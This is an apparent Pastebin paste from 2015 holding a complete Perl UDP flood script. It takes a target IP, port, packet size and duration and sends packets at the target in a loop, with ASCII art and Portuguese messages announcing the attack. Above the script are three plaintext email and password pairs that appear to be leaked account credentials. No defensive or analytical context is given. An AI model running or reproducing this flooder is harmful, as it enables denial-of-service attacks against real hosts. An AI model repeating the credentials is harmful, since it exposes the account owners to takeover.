Advertisement
Guest User

Script Strong

a guest
Jun 29th, 2015
229
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 1.36 KB | None | 0 0
  1. KirkDavinci@gmail.com:kdog11
  2.  
  3. kennethilagan2013@gmail.com:Kkkk2006
  4.  
  5. ferhatdikmen@gmail.com:AFGANFERHAT0781
  6.  
  7.  
  8.  
  9.  
  10.  
  11. #!/usr/bin/perl
  12.  
  13. ##########################
  14. # By Strong  #
  15. ##########################
  16.  
  17. use Socket;
  18. use strict;
  19.  
  20. if ($#ARGV != 3) {
  21.  print "               By              \n\n";
  22.   print "             Strong \n";
  23.   print "          Mal Proveito\n";
  24.   print "               XD \n";
  25.   exit(1);
  26. }
  27.  
  28. my ($ip,$port,$size,$time) = @ARGV;
  29.  
  30. my ($iaddr,$endtime,$psize,$pport);
  31.  
  32. $iaddr = inet_aton("$ip") or die "IP inválido: $ip\n";
  33. $endtime = time() + ($time ? $time : 100000000000);
  34.  
  35. socket(flood, PF_INET, SOCK_DGRAM, 17);
  36.  
  37.  
  38. print "……(\_/)
  39. ……( ‘_’)
  40. …./”""”""”""\======░ ▒▓▓█D
  41. /”""”""”""”""”"”\
  42. \_@_@_@_@_@_/ DOwn Disparado Contra O Ip E Porta By Strong $ip " . ($port ? $port : "random") . " com " .
  43.  ($size ? "$size-bytes" : "random size") . " de pacotes" .
  44.  ($time ? " por $time segundos" : "") . "\n";
  45. print "Pare o ataque pressionando Ctrl + C\n" unless $time;
  46.  
  47. for (;time() <= $endtime;) {
  48.  $psize = $size ? $size : int(rand(1000-64)+64) ;
  49.  $pport = $port ? $port : int(rand(65500))+1;
  50.  
  51.  send(flood, pack("a$psize","flood"), 0, pack_sockaddr_in($pport, $iaddr));}
  52.  
  53.  
  54.  
  55.  
  56.  
  57. http://tudoaki-download.blogspot.com.br/2013/03/desenhos-feito-com-letras.html
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement